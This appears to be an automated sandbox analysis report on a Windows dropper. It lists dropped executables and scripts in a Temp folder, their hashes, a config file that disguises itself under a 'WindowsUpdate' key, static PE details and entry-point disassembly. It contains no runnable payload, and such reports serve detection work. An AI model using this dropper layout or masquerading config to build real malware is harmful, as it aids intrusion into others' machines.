                                                                                                                                                    SHA1:1B60BB127972D76F4243310B05849C2937E4BE76
                                                                                                                                                    SHA-256:06E60D78DD1402360ED52DD46A1F09787B52CBC4CEF80676F5600CA49CCBBB23
                                                                                                                                                    SHA-512:446FA89E11D2D3EE7ECE303273C573D37AE6A7D490F70101B8A174AE6F3FAE859F51F0FC8D52588B6C6C00FE98C2943556FC8BA9A33D8324CBAA2F649371449B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:G63Ah60Y48540xIUNl7j2083w0Gnh5514HSH2A53ogqaCpG19VV2c82493j7088nLOuOPU5AWMf09915E2ag96oD5467P412584MW1xLHVZQi6BifJ1245298T3..BorderConstants FontConstants..lpoy252u2POZL4i2w5FZI03pc0g6068ndO1EOklhFmm27646swE3hQ3554gRI9fup9v0l37..FontConstants StructureConstants..5199q8DhUO0Z2Sv1h190iH16p2o9v8U56N600q00C31U6637c9BcB983x6y7M350y7dJz3H133118968N9R3j1437U52237t8I25H..ComboConstants ToolTipConstants..8n5074w2TQK442655GI5N99m1A42Mt03KgSpJN3Y6Xl4n4BV2J9UwgI7qpRJ57KqKh05ZgjU93M5la8iAGl7o4TEKn8WFW3tM24P1U810wE5Y051948CULA454jgHKw28kTr9Q..ComboConstants TreeViewConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\ukphwj.xl

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):504
                                                                                                                                                    Entropy (8bit):5.6259340620268485
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:nLEs50ubuRJk68a9EKgRecunhJ932kDtx/:LXpbArd9wDuhJR2k/
                                                                                                                                                    MD5:35470D47483607BF2DE0FDC542EFD0A6
                                                                                                                                                    SHA1:C2085CF4A1A687201DCB2AF61D7F2BB28473F664
                                                                                                                                                    SHA-256:E72BF5652C4E6E6FCCB590BFCB2E6081C4C6F540D61ABDE5FF168BA641D34C6F
                                                                                                                                                    SHA-512:D95FFCC8458D3DB253388CFFC61DB76331008AA0D9223E91B8ACB2E1C60AD0C19501720FC67F5207B82B191ECFD8BC75E479C3F37FFBA83493CAC61B11680A36
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:nj3b210Z3UP3L26cnFC2r618n9YZizNA9g8gK1AXX134125Lzy02TEt69Uth0S4Qz5l67Lv885M28zC1330m43x1k6n1015HCA8ZK29UA5X5bHY13..UpDownConstants StructureConstants..eF999mo8xq0t7411wvZjxO11qr2WR9g71P..BorderConstants BorderConstants..8327hUvZe4n53udL12vuK898eh9zn29HLbJ4319wH6j2jN5t9473y7Ef0FOc419K7C6WZ9F7zXVtMXoyDNH15Fu95Fp636..ButtonConstants StructureConstants..v6565y0pM4EXh6bl8ufHEF37mqsf5zNnMs1R19Z1xd8f010cmB6sSaVG7C5UD3m98fjd18934A6cp6K9409385whk4p94T7y65Y10ZUPla6733M01H47..GuiDateTimePicker ComboConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\wihpoq.mp2

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):533
                                                                                                                                                    Entropy (8bit):5.555122671725166
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RdDw8Z9v6lt21VgwOBPsptEyIrQakNSc3fA6:jUs9v+rK0bkAc3l
                                                                                                                                                    MD5:18B3CA792233B183954D86380D53BAF2
                                                                                                                                                    SHA1:FE7D78E2EF67B2B37BF608B7D8D2D9820A483322
                                                                                                                                                    SHA-256:4E8D26FBD55BDA61F1CBDA0326439663F32B735D8B70B52D531150AACBE236C8
                                                                                                                                                    SHA-512:6CE4A5ADBB3F9C48C5B35A03188DD0EA9218D2D4A0E79AD19DDFC77FF882A5B39BC57E62C8EC7A4F289E8127E5520E9FF1465FC0502057D43EB61F100522E562
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:b4f726l0QGf76y..ButtonConstants FileConstants..3WbMc4AZ97o6I09TWs53ba879m2l4yVIp43cIp06W213mvDU4w18lKl3rJMz5f2cG00M6535E05v4jr29A22881o4UCj9666hu9l7ic5o442621Kcj453JX68k63..UpDownConstants BorderConstants..073CZ36HV5W1QjzX822E01DxZhY624VCfQ7m3m3574k6fQ64in5a143S44k21VQgq68no8q2A6X8JC81E0597K272m03gRe2C9KBT53..DateTimeConstants TreeViewConstants..52e5PwO90U61RO743Wn9m637x7og2V6VKBWk8mJEr42641Gq9OD79wcv1h2PqR34422GU2uZQ7Mp0b5528biUH121230atT782477cDk2m6w65E70tpFa02BrX6NzNj5k92n762Pqne67512b91mDeo..BorderConstants ColorConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\wlsraclfv.mp3

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):578
                                                                                                                                                    Entropy (8bit):5.5345726532215
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:xPX+i9s1IZgyy+naIaSbICMulsOraBP0A9R6ved9:xPX+Gs1IMcf5ICdzaCA36Gd9
                                                                                                                                                    MD5:4C33AC9510E5F22AEA359252392E7DC6
                                                                                                                                                    SHA1:D8F0D8C95A43043F68C1794FF7CEF803CCDCB969
                                                                                                                                                    SHA-256:5603CB963F200915EB60ACEB7837EDB35CB1BE8CCFF16FBA9DD1EAF26272DE06
                                                                                                                                                    SHA-512:96610AC9CEB1040CF1F063D701148848289ED51E7A1A6C235DD684B4A75073FB7BA092686EDD97AFDEEAEF8DF390BE88220633215C42325BFFB141C03D0A98BF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:5Dm8835K23W09Hj601A42B4U6li2423HmO5e10X4CedB37E0BtoOWy7qT8XVvc1U42j18kC530J1542wMgX08OL..StructureConstants ToolTipConstants..8W5V0m4F54Y5fXRi099K3g4oXt0R0W0Q7h136r9718k56979K915643PGj4BKlH9885023xCJU9jL3KByQL35301oJ0Hm1s693i2U23Kr83Q6umW0589RW7j5G1v22Ywg..GuiDateTimePicker ButtonConstants..3Hp9CZ7851K3ZTPFX88Cm60DtuA9R8wD04q7D4178Q64trFM417b2Ua4glw8Z15Uc6v020D7A18F425By7..ToolbarConstants TreeViewConstants..U5L14060Qasd4Xm82t330h28PZ0e5Wx..StructureConstants StructureConstants..2hCx10E5X5OO753T2X6ZpjtA2039n3jTQ58936346A72Sst21ob7CCk712O..ButtonConstants UpDownConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\wnrs.vbe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):75082
                                                                                                                                                    Entropy (8bit):2.98395248326991
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:QRzzzzzzzzzzzpYqqqqqqqqqqqqqqqqqqqqqqqqN0YDDDDDDDDDDDDDDDDDDDDDE:pH5mUKW7/3WCv+nohnrQ
                                                                                                                                                    MD5:E35FFF73AEE2E4616A02721A2BB87382
                                                                                                                                                    SHA1:493FB9EE1BE78EE56AFDAAA41B0C96470A20F491
                                                                                                                                                    SHA-256:27BBC7BAED22B649F4F9E5C8F07B46DE15D18AB0D98EA38FF8B28D9690BF553C
                                                                                                                                                    SHA-512:76A901A66E701C7C937AABEF2D5B4F8E488E25D89C683DA61E28B6419AAA75C322A9E5F66C9951388F876E89B485BCBC0AB2108F6FB58882205503E3FB08F4BE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.....T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.....T.e.l.e.V.r.a.m.(.1.2.4.).:.

                                                                                                                                                    C:\Users\user\temp\amfmrpfqdh.msc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):78
                                                                                                                                                    Entropy (8bit):4.878368809094884
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YRRvuf0nNp9JlC9hRGdYX26LIw:Av7hoGXNw
                                                                                                                                                    MD5:45185EE7D06012E9FEEFAE9CAC4A07FC
                                                                                                                                                    SHA1:9B59DD7CF3233FC239F7A9CB846CEF6D55DC4B91
                                                                                                                                                    SHA-256:955DC301E143A1DD4A40BA2A907A117940AAD4430190AD0281F10A20709429B0
                                                                                                                                                    SHA-512:946ACD1FBCEA7CD93EF5935FAC6EF95A607CB7BE9A42149064D8012614F5B4762A68F852FB798813A73BC3F631EBD1DDA9F022E9A2E12061B23CC88AFA08C9A7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:[S3tt!ng]..stpths=%temp%..Key=WindowsUpdate..Dir3ctory=qbmt..ExE_c=oxhvi.msc..

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):7.774899458480801
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:M1Y6kc9FpE.exe
                                                                                                                                                    File size:1'050'479 bytes
                                                                                                                                                    MD5:7d8165e194302250d880425b1608e307
                                                                                                                                                    SHA1:2688c9a6a3946fd7d93fd861c5f94c0dd67ae593
                                                                                                                                                    SHA256:a1cafe0d39cc17c0e36db2afdb4f640e3e81da7b2302c01e03c96348723ffdc9
                                                                                                                                                    SHA512:eb1c4dd9095dcd6a82616f7d4260e45ee686e4c80c0f046639fdae08fd5c70ead604be0d4cce09d01466b239726c93ec4de579222eb755c6cdf641fd902c415f
                                                                                                                                                    SSDEEP:24576:hN/BUBb+tYjBFHNhM6FI9Dh7S95UqJXRX1zJ54D+q0lPBzkFd:jpUlRhPMn2owXRX1zJ5w+JPBAd
                                                                                                                                                    TLSH:7A251212BBC58072D07329321FB697A0257C75312F6289DB53D069AD9F719C2DA32FA3
                                                                                                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:4d0d0d191d1d197d

                                                                                                                                                    Static PE Info

                                                                                                                                                    General

                                                                                                                                                    Entrypoint:0x4265d0
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:false
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:5
                                                                                                                                                    OS Version Minor:1
                                                                                                                                                    File Version Major:5
                                                                                                                                                    File Version Minor:1
                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                    Import Hash:99ee65c2db82c04251a5c24f214c8892

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    call 00007FABFCC643CBh
                                                                                                                                                    jmp 00007FABFCC63D4Dh
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    push ecx
                                                                                                                                                    lea ecx, dword ptr [esp+08h]
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    and ecx, 0Fh
                                                                                                                                                    add eax, ecx
                                                                                                                                                    sbb ecx, ecx
                                                                                                                                                    or eax, ecx
                                                                                                                                                    pop ecx
                                                                                                                                                    jmp 00007FABFCC633FFh
                                                                                                                                                    push ecx
                                                                                                                                                    lea ecx, dword ptr [esp+08h]
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    and ecx, 07h
                                                                                                                                                    add eax, ecx
                                                                                                                                                    sbb ecx, ecx
                                                                                                                                                    or eax, ecx
                                                                                                                                                    pop ecx
                                                                                                                                                    jmp 00007FABFCC633E9h
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    sub esp, 0Ch
                                                                                                                                                    lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                    call 00007FABFCC56929h
                                                                                                                                                    push 0044634Ch
                                                                                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                    push eax
                                                                                                                                                    call 00007FABFCC64BF7h
                                                                                                                                                    int3
                                                                                                                                                    jmp 00007FABFCC6A92Eh
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    push 004293C0h
                                                                                                                                                    push dword ptr fs:[00000000h]
                                                                                                                                                    mov eax, dword ptr [esp+10h]
                                                                                                                                                    mov dword ptr [esp+10h], ebp
                                                                                                                                                    lea ebp, dword ptr [esp+10h]
                                                                                                                                                    sub esp, eax
                                                                                                                                                    push ebx
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    mov eax, dword ptr [00449778h]
                                                                                                                                                    xor dword ptr [ebp-04h], eax
                                                                                                                                                    xor eax, ebp
                                                                                                                                                    push eax
                                                                                                                                                    mov dword ptr [ebp-18h], esp
                                                                                                                                                    push dword ptr [ebp-08h]
                                                                                                                                                    mov eax, dword ptr [ebp-04h]
                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                                                                    lea eax, dword ptr [ebp-10h]
                                                                                                                                                    mov dword ptr fs:[00000000h], eax
                                                                                                                                                    ret
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    mov ecx, dword ptr [ebp-10h]
                                                                                                                                                    mov dword ptr fs:[00000000h], ecx
                                                                                                                                                    pop ecx
                                                                                                                                                    pop edi
                                                                                                                                                    pop edi
                                                                                                                                                    pop esi
                                                                                                                                                    pop ebx
                                                                                                                                                    mov esp, ebp
                                                                                                                                                    pop ebp
                                                                                                                                                    push ecx
                                                                                                                                                    ret
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp

                                                                                                                                                    Rich Headers

                                                                                                                                                    Programming Language:
                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                    • [IMP] VS2008 SP1 build 30729

                                                                                                                                                    Data Directories

                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x47d700x34.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x47da40x50.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x5134.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000x2afc.reloc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x445800x54.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x446000x18.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ec580x40.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x280.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4722c0x120.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                    Sections

                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x3a32c0x3a400e320764e1b3c816ba80aeb820cb8a274False0.581381605418455data6.685359764265178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0x3c0000xcbf80xcc0047c3be3304bfdfb2a778f355849d1c3fFalse0.4439529718137255data5.167069652624378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0x490000xd7e00x12006335f9314c2900dccb530e151f1b1ee8False0.3956163194444444data4.0290550032041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .didat0x570000x1a80x200232a8fe82993b55cefe09cffc39a79b0False0.462890625data3.5080985761326375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .rsrc0x580000x51340x5200bfa63777cb8495b69c7a6e54d8390262False0.612280868902439data6.3604830181772565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .reloc0x5e0000x2afc0x2c0098fd4bc572f87a21f69dc57f720a6dbcFalse0.75data6.617141671767599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                    PNG0x585540xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                                    PNG0x5909c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                                    RT_ICON0x5a6480x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7624113475177305
                                                                                                                                                    RT_DIALOG0x5aab00x286dataEnglishUnited States0.5092879256965944
                                                                                                                                                    RT_DIALOG0x5ad380x13adataEnglishUnited States0.60828025477707
                                                                                                                                                    RT_DIALOG0x5ae740xecdataEnglishUnited States0.6991525423728814
                                                                                                                                                    RT_DIALOG0x5af600x12edataEnglishUnited States0.5927152317880795
                                                                                                                                                    RT_DIALOG0x5b0900x338dataEnglishUnited States0.45145631067961167
                                                                                                                                                    RT_DIALOG0x5b3c80x252dataEnglishUnited States0.5757575757575758
                                                                                                                                                    RT_STRING0x5b61c0x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                                    RT_STRING0x5b8000x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                                    RT_STRING0x5b9cc0x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                                    RT_STRING0x5bb840x146dataEnglishUnited States0.5153374233128835
                                                                                                                                                    RT_STRING0x5bccc0x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                                    RT_STRING0x5c1380x166dataEnglishUnited States0.49162011173184356
                                                                                                                                                    RT_STRING0x5c2a00x152dataEnglishUnited States0.5059171597633136
                                                                                                                                                    RT_STRING0x5c3f40x10adataEnglishUnited States0.49624060150375937
                                                                                                                                                    RT_STRING0x5c5000xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                                    RT_STRING0x5c5bc0x1c0dataEnglishUnited States0.5178571428571429
                                                                                                                                                    RT_STRING0x5c77c0x250dataEnglishUnited States0.44256756756756754
                                                                                                                                                    RT_GROUP_ICON0x5c9cc0x14data1.1
                                                                                                                                                    RT_MANIFEST0x5c9e00x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                                                    Imports

                                                                                                                                                    DLLImport
